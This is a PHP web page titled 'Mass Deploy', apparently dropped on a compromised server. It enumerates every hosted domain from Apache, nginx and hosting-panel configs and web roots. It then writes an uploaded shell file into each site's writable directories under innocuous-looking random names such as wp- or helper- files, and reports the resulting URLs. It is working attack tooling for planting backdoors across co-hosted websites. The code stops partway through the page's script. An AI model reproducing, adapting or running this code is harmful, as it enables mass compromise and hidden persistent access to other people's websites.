File: /var/www/html/v2.php
<?php
error_reporting(0);
ini_set('display_errors', 0);
function get_domains() {
$domains = [];
$scanned = [];
if (isset($_SERVER['SERVER_NAME']) && !empty($_SERVER['SERVER_NAME'])) {
$domains[] = $_SERVER['SERVER_NAME'];
$scanned[] = $_SERVER['SERVER_NAME'];
}
if (isset($_SERVER['HTTP_HOST']) && !empty($_SERVER['HTTP_HOST'])) {
if (!in_array($_SERVER['HTTP_HOST'], $scanned)) {
$domains[] = $_SERVER['HTTP_HOST'];
$scanned[] = $_SERVER['HTTP_HOST'];
}
}
$apache_configs = [
'/etc/apache2/sites-enabled/*.conf',
'/etc/apache2/sites-enabled/*',
'/etc/apache2/sites-available/*.conf',
'/etc/apache2/sites-available/*',
'/etc/apache2/vhosts.d/*.conf',
'/etc/apache2/conf-enabled/vhosts*.conf',
'/etc/apache2/conf-available/vhosts*.conf',
'/etc/httpd/conf.d/*.conf',
'/etc/httpd/conf.d/vhosts/*.conf',
'/etc/httpd/vhosts.d/*.conf',
'/etc/httpd/sites-enabled/*.conf',
'/etc/httpd/sites-available/*.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/httpd/conf/extra/httpd-vhosts.conf',
'/etc/httpd/conf/vhosts/*.conf',
'/etc/apache2/vhosts.d/*.conf',
'/etc/apache2/conf.d/vhosts.conf',
'/usr/local/etc/apache24/sites-enabled/*.conf',
'/usr/local/etc/apache24/sites-available/*.conf',
'/usr/local/etc/apache24/Includes/*.conf',
'/usr/local/etc/apache24/vhosts/*.conf',
'/usr/local/etc/apache24/extra/httpd-vhosts.conf',
'/usr/local/etc/apache2/sites-enabled/*.conf',
'/usr/local/etc/apache2/sites-available/*.conf',
'/usr/local/etc/apache2/Includes/*.conf',
'/usr/local/etc/apache2/vhosts/*.conf',
'/usr/local/etc/apache2/extra/httpd-vhosts.conf',
'/usr/local/etc/apache22/extra/httpd-vhosts.conf',
'/usr/local/etc/apache22/Includes/*.conf',
'/etc/apache2/extra/httpd-vhosts.conf',
'/etc/apache2/users/*.conf',
'/private/etc/apache2/extra/httpd-vhosts.conf',
'/private/etc/apache2/users/*.conf',
'/etc/httpd/conf/extra/*.conf',
'/etc/httpd/conf/vhosts/*.conf',
'/etc/apache2/vhosts.d/*.conf',
'/etc/httpd/extra/httpd-vhosts.conf',
'/etc/httpd/vhosts/*.conf',
'/opt/lampp/etc/extra/httpd-vhosts.conf',
'/opt/xampp/etc/extra/httpd-vhosts.conf',
'/Applications/XAMPP/etc/extra/httpd-vhosts.conf',
'/xampp/apache/conf/extra/httpd-vhosts.conf',
'/Applications/MAMP/conf/apache/extra/httpd-vhosts.conf',
'/wamp/bin/apache/apache2.4.*/conf/extra/httpd-vhosts.conf',
'/wamp/bin/apache/apache2.2.*/conf/extra/httpd-vhosts.conf',
'/laragon/etc/apache2/extra/httpd-vhosts.conf',
'/laragon/etc/apache2/sites-enabled/*.conf',
'/laragon/etc/apache2/sites-available/*.conf',
'/opt/bitnami/apache2/conf/extra/httpd-vhosts.conf',
'/opt/bitnami/apache2/conf/vhosts/*.conf',
'/opt/bitnami/apache2/conf/bitnami/*.conf',
'/usr/local/apache/conf/includes/*.conf',
'/usr/local/apache/conf/userdata/*/*/*.conf',
'/usr/local/apache/conf/extra/httpd-vhosts.conf',
'/var/www/vhosts/system/*/conf/httpd.conf',
'/var/www/vhosts/system/*/conf/last.conf',
'/etc/httpd/conf/extra/directadmin-vhosts.conf',
'/etc/httpd/conf/extra/httpd-includes.conf',
'/usr/local/directadmin/data/users/*/httpd.conf',
'/etc/apache2/sites-enabled/*.vhost',
'/etc/apache2/ispconfig/vhost/*.conf',
'/home/*/conf/web/*.conf',
'/home/*/conf/web/*.inc',
'/usr/local/vesta/data/templates/web/apache2/*.conf',
'/etc/webmin/virtual-server/apache/*.conf',
'/etc/apache2/sites-enabled/*froxlor*.conf',
'/etc/apache2/cloudlinux/vhosts*.conf',
'/etc/httpd/cloudlinux/vhosts*.conf',
'/etc/apache2/apache2.conf',
'/etc/apache2/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/usr/local/etc/apache24/httpd.conf',
'/usr/local/etc/apache2/httpd.conf',
'/opt/apache*/conf/httpd.conf',
'/etc/apache2/ports.conf',
'/etc/httpd/conf/ports.conf',
'/etc/apache2/mods-enabled/*.conf',
'/etc/httpd/conf.modules.d/*.conf',
'/etc/apache2/extra/httpd-ssl.conf',
'/etc/httpd/conf/extra/httpd-ssl.conf',
'/etc/apache2/mods-enabled/ssl.conf',
'/etc/httpd/conf.d/ssl.conf',
'/opt/apache*/conf.d/*.conf',
'/opt/apache*/conf/extra/httpd-vhosts.conf',
'/opt/apache*/conf/vhosts/*.conf',
'/opt/apache*/conf/sites-enabled/*.conf',
'/opt/apache*/conf/sites-available/*.conf',
'/usr/local/apache*/conf.d/*.conf',
'/usr/local/apache*/conf/extra/httpd-vhosts.conf',
'/usr/local/apache*/conf/vhosts/*.conf',
'/var/apache*/conf/extra/httpd-vhosts.conf',
'/var/apache*/conf/vhosts/*.conf',
'/etc/apache2/backup/*.conf',
'/etc/httpd/backup/*.conf',
'/etc/apache2/*.conf.bak',
'/etc/httpd/*.conf.bak',
'/etc/apache2/test/vhosts/*.conf',
'/etc/httpd/test/vhosts/*.conf',
];
foreach ($apache_configs as $pattern) {
$configs = glob($pattern);
if ($configs) {
foreach ($configs as $config) {
$content = @file_get_contents($config);
if ($content) {
preg_match_all('/(?:ServerName|ServerAlias)\s+([^\s]+)/i', $content, $matches);
if (!empty($matches[1])) {
foreach ($matches[1] as $domain) {
if (strpos($domain, '*') === false &&
strpos($domain, '.') !== false &&
!preg_match('/^[0-9.]+$/', $domain) &&
!in_array($domain, $scanned)) {
$domains[] = $domain;
$scanned[] = $domain;
}
}
}
}
}
}
}
$nginx_configs = [
'/etc/nginx/sites-enabled/*',
'/etc/nginx/sites-enabled/*.conf',
'/etc/nginx/sites-available/*',
'/etc/nginx/sites-available/*.conf',
'/etc/nginx/conf.d/*.conf',
'/etc/nginx/conf.d/*',
'/etc/nginx/conf.d/*.conf',
'/etc/nginx/conf.d/*',
'/etc/nginx/default.d/*.conf',
'/etc/nginx/conf.d/*.conf',
'/etc/nginx/http.d/*.conf',
'/etc/nginx/conf.d/*.conf',
'/etc/nginx/servers/*.conf',
'/etc/nginx/vhosts/*.conf',
'/etc/nginx/conf.d/*.conf',
'/etc/nginx/vhosts.d/*.conf',
'/usr/local/etc/nginx/sites-enabled/*',
'/usr/local/etc/nginx/sites-enabled/*.conf',
'/usr/local/etc/nginx/sites-available/*',
'/usr/local/etc/nginx/sites-available/*.conf',
'/usr/local/etc/nginx/conf.d/*.conf',
'/usr/local/etc/nginx/vhosts/*.conf',
'/usr/local/etc/nginx/vhosts.d/*.conf',
'/usr/local/etc/nginx116/sites-enabled/*.conf',
'/usr/local/etc/nginx117/sites-enabled/*.conf',
'/usr/local/etc/nginx118/sites-enabled/*.conf',
'/usr/local/etc/nginx119/sites-enabled/*.conf',
'/usr/local/etc/nginx120/sites-enabled/*.conf',
'/usr/local/etc/nginx/sites-enabled/*',
'/usr/local/etc/nginx/sites-enabled/*.conf',
'/usr/local/etc/nginx/sites-available/*',
'/usr/local/etc/nginx/sites-available/*.conf',
'/usr/local/etc/nginx/servers/*.conf',
'/opt/homebrew/etc/nginx/sites-enabled/*',
'/opt/homebrew/etc/nginx/sites-available/*',
'/usr/local/nginx/conf/sites-enabled/*',
'/usr/local/nginx/conf/sites-enabled/*.conf',
'/usr/local/nginx/conf/sites-available/*',
'/usr/local/nginx/conf/sites-available/*.conf',
'/usr/local/nginx/conf/vhosts/*.conf',
'/usr/local/nginx/conf/vhosts.d/*.conf',
'/usr/local/nginx/conf/conf.d/*.conf',
'/opt/nginx/conf/sites-enabled/*',
'/opt/nginx/conf/sites-enabled/*.conf',
'/opt/nginx/conf/sites-available/*',
'/opt/nginx/conf/sites-available/*.conf',
'/opt/nginx/conf/conf.d/*.conf',
'/opt/nginx/conf/vhosts.d/*.conf',
'/usr/local/openresty/nginx/conf/sites-enabled/*',
'/usr/local/openresty/nginx/conf/sites-available/*',
'/usr/local/openresty/nginx/conf/conf.d/*.conf',
'/usr/local/openresty/nginx/conf/vhosts/*.conf',
'/opt/openresty/nginx/conf/sites-enabled/*',
'/opt/openresty/nginx/conf/sites-available/*',
'/opt/openresty/nginx/conf/conf.d/*.conf',
'/usr/local/tengine/conf/sites-enabled/*',
'/usr/local/tengine/conf/sites-available/*',
'/usr/local/tengine/conf/conf.d/*.conf',
'/usr/local/tengine/conf/vhosts/*.conf',
'/usr/local/nginx/conf/conf.d/*.conf',
'/usr/local/nginx/conf/vhosts/*.conf',
'/usr/local/nginx/conf/includes/*.conf',
'/usr/local/nginx/conf/userdata/*/*/*.conf',
'/var/www/vhosts/system/*/conf/nginx.conf',
'/var/www/vhosts/system/*/conf/last.conf',
'/etc/nginx/directadmin-vhosts.conf',
'/etc/nginx/nginx-directadmin.conf',
'/usr/local/directadmin/data/users/*/nginx.conf',
'/etc/nginx/sites-enabled/*.vhost',
'/etc/nginx/sites-available/*.vhost',
'/etc/nginx/ispconfig/vhost/*.conf',
'/home/*/conf/web/*.conf',
'/home/*/conf/web/*.nginx.conf',
'/home/*/conf/web/nginx.conf',
'/usr/local/vesta/data/templates/web/nginx/*.conf',
'/etc/webmin/virtual-server/nginx/*.conf',
'/etc/nginx/sites-enabled/*froxlor*.conf',
'/etc/ajenti/plugins/nginx/*.conf',
'/Applications/MAMP/conf/nginx/servers/*.conf',
'/Applications/MAMP/conf/nginx/conf.d/*.conf',
'/laragon/etc/nginx/sites-enabled/*.conf',
'/laragon/etc/nginx/sites-available/*.conf',
'/laragon/etc/nginx/conf.d/*.conf',
'/laragon/etc/nginx/vhosts/*.conf',
'/opt/bitnami/nginx/conf/vhosts/*.conf',
'/opt/bitnami/nginx/conf/conf.d/*.conf',
'/opt/bitnami/nginx/conf/server_blocks/*.conf',
'/etc/nginx/conf.d/*.conf',
'/config/nginx/conf.d/*.conf',
'/config/nginx/sites-enabled/*',
'/etc/nginx/conf.d/*.conf',
'/etc/nginx/upstreams/*.conf',
'/etc/nginx/nginx.conf',
'/usr/local/etc/nginx/nginx.conf',
'/usr/local/nginx/conf/nginx.conf',
'/opt/nginx/conf/nginx.conf',
'/etc/nginx/stream.conf',
'/etc/nginx/stream.d/*.conf',
'/usr/local/etc/nginx/stream.conf',
'/usr/local/etc/nginx/stream.d/*.conf',
'/etc/nginx/backup/*.conf',
'/etc/nginx/conf.d/*.conf.bak',
'/usr/local/etc/nginx/*.conf.bak',
'/etc/nginx/test/*.conf',
'/etc/nginx/development/*.conf',
];
foreach ($nginx_configs as $pattern) {
$configs = glob($pattern);
if ($configs) {
foreach ($configs as $config) {
$content = @file_get_contents($config);
if ($content) {
preg_match_all('/server_name\s+([^;]+);/i', $content, $matches);
if (!empty($matches[1])) {
foreach ($matches[1] as $server_names) {
$names = preg_split('/\s+/', trim($server_names));
foreach ($names as $domain) {
if (strpos($domain, '*') === false &&
strpos($domain, '.') !== false &&
!preg_match('/^[0-9.]+$/', $domain) &&
!in_array($domain, $scanned)) {
$domains[] = $domain;
$scanned[] = $domain;
}
}
}
}
}
}
}
}
$root_dirs = [
'/var/www',
'/var/www/html',
'/var/www/htdocs',
'/home',
'/home2',
'/home3',
'/home4',
'/home/www',
'/www',
'/www/wwwroot',
'/home/www/wwwroot',
'/www/htdocs',
'/data/wwwroot',
'/webHome',
'/usr/local/www',
'/usr/share/nginx',
'/usr/share/nginx/html',
'/srv',
'/srv/http',
'/srv/www',
'/opt/lampp/htdocs',
'/opt/xampp/htdocs',
'/var/www/vhosts',
'/var/cpanel/userdata',
'/app',
'/app/public',
'/var/app/current',
'/home/site/wwwroot',
'/etc/httpd',
'/etc/nginx',
'/etc/apache2'
];
foreach ($root_dirs as $root) {
if (is_dir($root)) {
$dirs = glob("$root/*", GLOB_ONLYDIR);
foreach ($dirs as $dir) {
$domain = basename($dir);
if (strpos($domain, '.') !== false &&
!preg_match('/^[0-9.]+$/', $domain) &&
!in_array($domain, $scanned)) {
$domains[] = $domain;
$scanned[] = $domain;
}
$subdirs = glob("$dir/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdir) {
$subdomain = basename($subdir);
if (strpos($subdomain, '.') !== false &&
!preg_match('/^[0-9.]+$/', $subdomain) &&
!in_array($subdomain, $scanned)) {
$domains[] = $subdomain;
$scanned[] = $subdomain;
}
}
}
}
}
$domains = array_unique($domains);
$domains = array_filter($domains, function($domain) {
return !empty($domain) &&
$domain != 'localhost' &&
strpos($domain, '.') !== false &&
!preg_match('/^[0-9.]+$/', $domain) &&
strpos($domain, '*') === false &&
strpos($domain, '_') === false &&
strlen($domain) > 3;
});
return array_values($domains);
}
function generate_random_filename() {
$safe_patterns = [
'class-%s.php',
'helper-%s.php',
'util-%s.php',
'module-%s.php',
'include-%s.php',
'lib-%s.php',
'func-%s.php',
'data-%s.php',
'api-%s.php',
'ajax-%s.php',
'common-%s.php',
'core-%s.php',
'base-%s.php',
'wp-%s.php',
'admin-%s.php',
'template-%s.php',
'page-%s.php',
'form-%s.php',
'cache-%s.php',
'session-%s.php'
];
$random_id = substr(md5(mt_rand() . time() . uniqid()), 0, 8);
$pattern = $safe_patterns[array_rand($safe_patterns)];
return sprintf($pattern, $random_id);
}
function find_domain_paths($domain) {
$domain_paths = [];
$web_roots = [
$_SERVER['DOCUMENT_ROOT'] ?? '',
'/var/www',
'/var/www/html',
'/var/www/htdocs',
'/var/www/vhosts',
'/var/www/sites',
'/var/www/domains',
'/var/www/clients',
'/var/web',
'/var/webapps',
'/home',
'/home2',
'/home3',
'/home4',
'/home5',
'/home6',
'/home7',
'/home8',
'/home9',
'/home10',
'/home11',
'/home12',
'/home/www',
'/home/www/wwwroot',
'/users',
'/user',
'/usr/home',
'/webHome',
'/data/wwwroot',
'/www/wwwroot',
'/www/htdocs',
'/www/domains',
'/www/sites',
'/www/vhosts',
'/www/clients',
'/www/web',
'/web',
'/websites',
'/webapps',
'/sites',
'/domains',
'/hosting',
'/host',
'/usr/local/www',
'/usr/local/httpd',
'/usr/local/apache',
'/usr/local/apache2',
'/usr/local/nginx',
'/usr/share/nginx',
'/usr/share/nginx/html',
'/usr/share/httpd',
'/usr/share/apache2',
'/usr/share/web',
'/srv/www',
'/srv/http',
'/srv/httpd',
'/srv/sites',
'/srv/websites',
'/srv/web',
'/srv/apps',
'/srv/hosting',
'/srv/vhosts',
'/opt/lampp/htdocs',
'/opt/xampp/htdocs',
'/Applications/XAMPP/htdocs',
'/Applications/MAMP/htdocs',
'/opt/bitnami',
'/opt/bitnami/apache2/htdocs',
'/opt/bitnami/nginx/html',
'/var/www/vhosts',
'/var/www/vhosts/system',
'/var/www/html',
'/var/cpanel/userdata',
'/usr/local/apache/htdocs',
'/usr/local/cpanel/base/frontend',
'/var/www/html',
'/usr/local/directadmin/data/users',
'/app',
'/app/public',
'/app/web',
'/app/www',
'/var/app/current',
'/var/app/staging',
'/home/site/wwwroot',
'/site/wwwroot',
'/var/task',
'/var/task/public',
'/inetpub/wwwroot',
'/xampp/htdocs',
'/wamp/www',
'/laragon/www',
'/websites',
'/wwwroot',
'/Users/Shared/Sites',
'/Library/WebServer/Documents',
'/data/www',
'/data/web',
'/data/http',
'/data/htdocs',
'/data/sites',
'/storage/www',
'/storage/web',
'/public',
'/public_html',
'/public_html',
'/htdocs',
'/httpdocs',
'/webroot',
'/wwwroot',
'/site',
'/srvr',
'/server',
'/servers',
'/var/www/clients',
'/var/www/clients/client0',
'/var/www/clients/client1',
'/var/www/ispconfig',
'/home/admin/web',
'/home/user/web',
'/var/ajenti',
'/var/customers/webs',
'/var/www/virtual',
'/home/*/public_html',
'/workspace',
'/projects',
'/code',
'/src',
'/build',
'/dist',
'/public'
];
$domain_clean = str_replace(['www.', '.'], ['', '_'], $domain);
$domain_parts = explode('.', $domain);
$domain_base = $domain_parts[0];
$domain_variants = [
$domain,
'www.' . $domain,
str_replace('www.', '', $domain),
$domain_clean,
$domain_base
];
$server_configs = [
'/etc/apache2/sites-enabled/*.conf',
'/etc/apache2/sites-available/*.conf',
'/etc/apache2/apache2.conf',
'/etc/apache2/conf.d/*.conf',
'/etc/apache2/conf-enabled/*.conf',
'/etc/apache2/conf-available/*.conf',
'/etc/apache2/vhosts.d/*.conf',
'/etc/apache2/extra/httpd-vhosts.conf',
'/etc/apache2/httpd.conf',
'/etc/apache2/ports.conf',
'/etc/httpd/conf.d/*.conf',
'/etc/httpd/vhosts.d/*.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/httpd/conf/extra/httpd-vhosts.conf',
'/etc/httpd/conf/vhosts/*.conf',
'/etc/httpd/conf.modules.d/*.conf',
'/usr/local/etc/apache24/extra/httpd-vhosts.conf',
'/usr/local/etc/apache24/httpd.conf',
'/usr/local/etc/apache24/Includes/*.conf',
'/usr/local/etc/apache24/vhosts/*.conf',
'/usr/local/etc/apache24/sites-enabled/*.conf',
'/usr/local/etc/apache24/sites-available/*.conf',
'/usr/local/etc/apache2/extra/httpd-vhosts.conf',
'/usr/local/etc/apache2/httpd.conf',
'/usr/local/etc/apache2/Includes/*.conf',
'/usr/local/etc/apache2/vhosts/*.conf',
'/usr/local/etc/apache22/extra/httpd-vhosts.conf',
'/usr/local/etc/apache22/httpd.conf',
'/etc/nginx/sites-enabled/*',
'/etc/nginx/sites-available/*',
'/etc/nginx/conf.d/*.conf',
'/etc/nginx/nginx.conf',
'/etc/nginx/vhosts.d/*.conf',
'/etc/nginx/stream.conf',
'/etc/nginx/conf/*.conf',
'/usr/local/etc/nginx/sites-enabled/*',
'/usr/local/etc/nginx/sites-available/*',
'/usr/local/etc/nginx/conf.d/*.conf',
'/usr/local/etc/nginx/nginx.conf',
'/usr/local/etc/nginx/vhosts/*.conf',
'/usr/local/etc/nginx/Includes/*.conf',
'/opt/nginx/conf/*.conf',
'/opt/nginx/conf/vhosts/*.conf',
'/opt/nginx/conf/sites-enabled/*',
'/var/nginx/conf/*.conf',
'/etc/lighttpd/lighttpd.conf',
'/etc/lighttpd/conf.d/*.conf',
'/etc/lighttpd/conf-enabled/*.conf',
'/etc/lighttpd/vhosts.d/*.conf',
'/usr/local/etc/lighttpd/lighttpd.conf',
'/usr/local/etc/lighttpd/conf.d/*.conf',
'/usr/local/lsws/conf/httpd_config.conf',
'/usr/local/lsws/conf/vhosts/*.conf',
'/usr/local/lsws/conf/listeners/*.conf',
'/usr/local/lsws/conf/templates/*.conf',
'/etc/litespeed/conf/httpd_config.conf',
'/etc/litespeed/conf/vhosts/*.conf',
'/usr/local/lsws/conf/httpd_config.conf',
'/usr/local/lsws/conf/vhosts/*.conf',
'/etc/caddy/Caddyfile',
'/etc/caddy/conf.d/*',
'/usr/local/etc/caddy/Caddyfile',
'/usr/local/etc/caddy/conf.d/*',
'/opt/caddy/conf/Caddyfile',
'/windows/system32/inetsrv/config/applicationHost.config',
'/inetpub/wwwroot/web.config',
'/windows/Microsoft.NET/Framework*/config/web.config',
'/etc/tomcat*/server.xml',
'/etc/tomcat*/context.xml',
'/usr/share/tomcat*/conf/server.xml',
'/usr/local/tomcat/conf/server.xml',
'/opt/tomcat/conf/server.xml',
'/var/lib/tomcat*/conf/server.xml',
'/etc/apache2/conf.d/includes/*.conf',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/includes/*.conf',
'/usr/local/apache/conf/userdata/*/*/*.conf',
'/var/cpanel/userdata/*/*.conf',
'/var/cpanel/conf/apache/local',
'/etc/apache2/plesk.conf',
'/etc/nginx/plesk.conf',
'/var/www/vhosts/system/*/conf/*.conf',
'/usr/local/psa/admin/conf/*.conf',
'/usr/local/psa/etc/vhosts/*.conf',
'/etc/httpd/conf/extra/directadmin-vhosts.conf',
'/etc/httpd/conf/extra/httpd-includes.conf',
'/usr/local/directadmin/data/users/*/httpd.conf',
'/etc/apache2/sites-enabled/*.vhost',
'/etc/apache2/ispconfig/*.conf',
'/etc/nginx/sites-enabled/*.vhost',
'/usr/local/vesta/data/templates/web/*.conf',
'/home/*/conf/web/*.conf',
'/etc/nginx/conf.d/*.inc',
'/etc/webmin/virtual-server/*.conf',
'/etc/webmin/config',
'/etc/apache2/sites-enabled/*froxlor*.conf',
'/etc/nginx/sites-enabled/*froxlor*.conf',
'/etc/froxlor/*.conf',
'/etc/ajenti/*.conf',
'/var/lib/ajenti/plugins/*/config.json',
'/opt/lampp/etc/extra/httpd-vhosts.conf',
'/opt/lampp/etc/httpd.conf',
'/opt/xampp/etc/extra/httpd-vhosts.conf',
'/opt/xampp/etc/httpd.conf',
'/Applications/XAMPP/etc/extra/httpd-vhosts.conf',
'/Applications/XAMPP/etc/httpd.conf',
'/Applications/MAMP/conf/apache/extra/httpd-vhosts.conf',
'/Applications/MAMP/conf/apache/httpd.conf',
'/Applications/MAMP/conf/nginx/nginx.conf',
'/opt/bitnami/apache2/conf/httpd.conf',
'/opt/bitnami/apache2/conf/extra/httpd-vhosts.conf',
'/opt/bitnami/nginx/conf/nginx.conf',
'/opt/bitnami/nginx/conf/vhosts/*.conf',
'/etc/service/*/config/*.conf',
'/config/nginx/nginx.conf',
'/config/apache2/*.conf',
'/etc/elasticbeanstalk/*.conf',
'/var/elasticbeanstalk/config/*.conf',
'/home/site/wwwroot/web.config',
'/etc/google-cloud-ops-agent/config.yaml',
'/etc/apache2/cloudlinux/*.conf',
'/etc/httpd/cloudlinux/*.conf',
'/Users/*/.config/valet/Nginx/*',
'/Users/*/.valet/Nginx/*',
'/laragon/etc/nginx/nginx.conf',
'/laragon/etc/nginx/sites-enabled/*',
'/laragon/etc/apache2/httpd.conf',
'/laragon/etc/apache2/extra/httpd-vhosts.conf',
'/wamp/bin/apache/apache*/conf/extra/httpd-vhosts.conf',
'/wamp/bin/apache/apache*/conf/httpd.conf',
'/xampp/apache/conf/extra/httpd-vhosts.conf',
'/xampp/apache/conf/httpd.conf',
'/opt/*/conf/*.conf',
'/opt/*/config/*.conf',
'/usr/local/etc/*/conf.d/*.conf',
'/usr/local/etc/*/sites-enabled/*',
'/usr/local/etc/*/sites-available/*',
'/var/local/*/conf/*.conf',
'/var/config/*/*.conf',
'/config/*/*.conf',
'/storage/*/conf/*.conf',
'/etc/apache2/backup/*.conf',
'/etc/nginx/backup/*.conf',
'/etc/httpd/backup/*.conf',
'/var/backups/*/conf/*.conf',
'/etc/ssl/*/conf/*.conf',
'/etc/letsencrypt/*.conf',
'/etc/haproxy/haproxy.cfg',
'/etc/haproxy/conf.d/*.conf',
'/etc/traefik/traefik.yml',
'/etc/traefik/conf.d/*.conf',
'/etc/loadbalancer/*.conf',
'/etc/loadbalancer/conf.d/*.conf'
];
foreach ($server_configs as $pattern) {
$configs = glob($pattern);
if ($configs) {
foreach ($configs as $config) {
$content = @file_get_contents($config);
if ($content && stripos($content, $domain) !== false) {
$doc_pattern = '/(?:DocumentRoot|root)\s+[\'"]?([^\'"\s;]+)[\'"]?/i';
if (preg_match($doc_pattern, $content, $doc_match)) {
$path = $doc_match[1];
if (is_dir($path) && is_writable($path)) {
$domain_paths[] = $path;
}
}
}
}
}
}
foreach ($web_roots as $root) {
if (empty($root) || !is_dir($root) || !is_readable($root)) continue;
foreach ($domain_variants as $variant) {
$path = "$root/$variant";
if (is_dir($path)) {
$domain_paths[] = $path;
$subdirs = ['public_html', 'httpdocs', 'www', 'public', 'web', 'htdocs'];
foreach ($subdirs as $subdir) {
$subpath = "$path/$subdir";
if (is_dir($subpath)) {
$domain_paths[] = $subpath;
}
}
}
}
}
$cpanel_patterns = [
"/home/*/public_html",
"/home/*/www",
"/home/*/web",
"/home/*/htdocs",
"/home/*/httpdocs",
"/home2/*/public_html",
"/home3/*/public_html",
"/home4/*/public_html",
"/home5/*/public_html",
"/home6/*/public_html",
"/home7/*/public_html",
"/home8/*/public_html",
"/home9/*/public_html",
"/home10/*/public_html",
"/home11/*/public_html",
"/home12/*/public_html",
"/home/*/subdomains/*/public_html",
"/home/*/subdomains/*/www",
"/home/*/subdomains/*/web",
"/home/*/addondomains/*/public_html",
"/home/*/addondomains/*/www",
"/home/*/addondomains/*/web",
"/home/*/parkeddomains/*/public_html",
"/home/*/domains/*/public_html",
"/home/*/domains/*/www",
"/home/*/public_html/*",
];
foreach ($cpanel_patterns as $pattern) {
$matching_paths = glob($pattern, GLOB_ONLYDIR);
foreach ($matching_paths as $path) {
$domain_dir = $path . '/' . $domain;
if (is_dir($domain_dir)) {
$domain_paths[] = $domain_dir;
}
}
}
$domain_paths = array_unique($domain_paths);
$writable_paths = [];
foreach ($domain_paths as $path) {
if (is_writable($path)) {
$writable_paths[] = $path;
}
}
return !empty($writable_paths) ? $writable_paths : $domain_paths;
}
function deploy_to_domains($domains, $content) {
$results = [];
if (empty($content)) {
return [
"error" => "No content provided for deployment"
];
}
$max_time = 30;
$start_time = time();
foreach ($domains as $domain) {
if (time() - $start_time > $max_time) {
$results[] = ["domain" => $domain, "status" => "skipped", "reason" => "Time limit exceeded"];
continue;
}
$success = false;
$deployed_path = "";
$deployed_url = "";
$shell_name = generate_random_filename();
$domain_paths = find_domain_paths($domain);
if (empty($domain_paths)) {
$results[] = [
"domain" => $domain,
"status" => "failed",
"error" => "No valid paths found for this domain"
];
continue;
}
foreach ($domain_paths as $base_path) {
if (time() - $start_time > $max_time) {
break;
}
$shell_path = $base_path . '/' . $shell_name;
if (@file_put_contents($shell_path, $content)) {
if (file_exists($shell_path) && filesize($shell_path) > 0) {
$success = true;
$deployed_path = $shell_path;
$deployed_url = 'http://' . $domain . '/' . $shell_name;
break;
}
}
$common_writeable_dirs = [
'wp-content/uploads',
'wp-content/themes',
'wp-content',
'images',
'img',
'uploads',
'media',
'files',
'cache',
'tmp',
'temp',
'assets',
'data',
'logs'
];
foreach ($common_writeable_dirs as $subdir) {
$dir_path = $base_path . '/' . $subdir;
if (is_dir($dir_path) && is_writable($dir_path)) {
$shell_path = $dir_path . '/' . $shell_name;
if (@file_put_contents($shell_path, $content)) {
if (file_exists($shell_path) && filesize($shell_path) > 0) {
$success = true;
$deployed_path = $shell_path;
$deployed_url = 'http://' . $domain . '/' . $subdir . '/' . $shell_name;
break 2;
}
}
}
}
}
if ($success) {
$results[] = [
"domain" => $domain,
"status" => "success",
"path" => $deployed_path,
"url" => $deployed_url,
"filename" => $shell_name
];
} else {
$results[] = [
"domain" => $domain,
"status" => "failed",
"error" => "No writable directory found or access denied"
];
}
}
return $results;
}
// Handle API request
if (isset($_GET['api']) && $_GET['api'] === 'deploy') {
header('Content-Type: application/json');
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['shell_file']) && $_FILES['shell_file']['error'] === UPLOAD_ERR_OK) {
$shell_content = file_get_contents($_FILES['shell_file']['tmp_name']);
if (!empty($shell_content)) {
$domains = get_domains();
if (!empty($domains)) {
$results = deploy_to_domains($domains, $shell_content);
echo json_encode(['status' => 'success', 'results' => $results]);
} else {
echo json_encode(['status' => 'error', 'message' => 'No domains found on this server']);
}
} else {
echo json_encode(['status' => 'error', 'message' => 'Failed to read uploaded file']);
}
} else {
echo json_encode(['status' => 'error', 'message' => 'Please upload a valid shell file']);
}
} else {
echo json_encode(['status' => 'error', 'message' => 'Method not allowed']);
}
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mass Deploy</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
background: #1a1a1a;
color: #ddd;
font-family: 'Courier New', monospace;
padding: 20px;
min-height: 100vh;
}
.container {
max-width: 800px;
margin: 0 auto;
background: #222;
border: 1px solid #444;
padding: 30px;
}
h1 {
color: #7ef77e;
text-align: center;
margin-bottom: 30px;
font-size: 24px;
}
.upload-box {
border: 2px dashed #444;
padding: 40px;
text-align: center;
margin-bottom: 20px;
transition: border-color 0.3s;
}
.upload-box:hover {
border-color: #7ef77e;
}
input[type="file"] {
display: none;
}
.file-label {
background: #333;
color: #ddd;
padding: 10px 20px;
cursor: pointer;
display: inline-block;
border: 1px solid #555;
}
.file-label:hover {
background: #444;
}
.file-name {
margin-top: 15px;
color: #aaa;
}
.deploy-btn {
background: #1d5e1d;
color: #fff;
border: none;
padding: 12px 30px;
cursor: pointer;
width: 100%;
font-size: 16px;
margin-top: 20px;
}
.deploy-btn:hover {
background: #2d7a2d;
}
.deploy-btn:disabled {
background: #333;
cursor: not-allowed;
}
.results {
background: #1a1a1a;
border: 1px solid #444;
padding: 20px;
margin-top: 20px;
max-height: 500px;
overflow-y: auto;
}
.loading {
text-align: center;
color: #7ef77e;
padding: 20px;
}
pre {
white-space: pre-wrap;
word-wrap: break-word;
font-size: 12px;
line-height: 1.5;
}
.success { color: #7ef77e; }
.error { color: #f77e7e; }
</style>
</head>
<body>
<div class="container">
<h1>MASS DEPLOYMENT TOOL</h1>
<div class="upload-box">
<label for="shellFile" class="file-label">Choose Shell File</label>
<input type="file" id="shellFile" accept=".php,.txt">
<div class="file-name" id="fileName">No file selected</div>
</div>
<button class="deploy-btn" id="deployBtn" disabled>Deploy to All Domains</button>
<div id="results"></div>
</div>
<script>
const fileInput = document.getElementById('shellFile');
const fileName = document.getElementById('fileName');
const deployBtn = document.getElementById('deployBtn');
const resultsDiv = document.getElementById('results');
fileInput.addEventListener('change', function() {
if (this.files && this.files[0]) {
fileName.textContent = this.files[0].name;
deployBtn.disabled = false;
} else {
fileName.textContent = 'No file selected';
deployBtn.disabled = true;
}
});
deployBtn.addEventListener('click', function() {
if (!fileInput.files || !fileInput.files[0]) {
alert('Please select a file');
return;
}
const formData = new FormData();
